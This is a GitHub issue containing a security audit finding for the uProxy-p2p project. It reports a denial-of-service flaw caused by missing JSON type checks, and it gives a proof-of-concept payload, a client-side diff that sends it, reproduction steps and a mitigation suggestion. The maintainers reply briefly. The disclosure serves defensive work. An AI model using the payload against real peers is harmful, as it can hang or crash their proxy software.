uProxy-p2p icon indicating copy to clipboard operation
uProxy-p2p copied to clipboard
verified publisher icon UWNetworksLab

UP-01-002 DoS through insufficient JSON Type Verification

Open cure53 opened this issue 11 years ago • 3 comments

The files rtc-to-net.ts and socks-to-rtc.ts loop over an array that is received over the network as JSON - without checking that the array is not actually an object. By supplying a specifically crafted object, it is possible to remotely cause an endless loop:

PoC: { version: 1, messages: {length: 9007199254740992} }

To test this, one can modify the code using this JSON object whenever a sendSignalToPeer event is emitted. In our tests, when such a modified client connected to the server, this caused the server to loop for a few seconds before it was terminated by Chrome and had to be restarted manually.

Steps to reproduce:

_Attacker:_ Open the directory containing the chrome app, apply the following patch:

diff -rupN build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js
--- build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 10:23:33.636076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 12:22:04.716132556 +0200
@@ -168,7 +168,7 @@ var RtcToNet;
                         peerId: peerId,
                         data: JSON.stringify({
                             version: 1,
-                            messages: queuedMessages
+                            messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                         })
                     });
                     queuedMessages = [];
diff -rupN build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js
--- build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 10:23:33.638076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 12:23:13.930133104 +0200
@@ -49,7 +49,7 @@ var SocksToRTC;
                                 peerId: peerId,
                                 data: JSON.stringify({
                                     version: 1,
-                                    messages: queuedMessages
+                                    messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                                 })
                             });
                             queuedMessages = [];

_Attacker:_ Request permission to proxy from the victim _Victim:_ Grant permission to proxy _Attacker:_ Connect to proxy

To mitigate this issue, it should be verified that incoming JSON objects conform to the expected format. It might be an option to use the “conform” helper provided by freedom.js for that very purpose.

cure53 avatar Aug 26 '14 16:08 cure53

Ooo! to avoid duplicating work, for networking code, please review the new branch that's about to land... https://github.com/uProxy/uproxy-networking/tree/iislucas-webrtc_pc3

Thanks!

iislucas avatar Aug 26 '14 16:08 iislucas

Nice find by the way!

iislucas avatar Aug 26 '14 16:08 iislucas

Aye, we shall ;) Thx!

cure53 avatar Aug 26 '14 16:08 cure53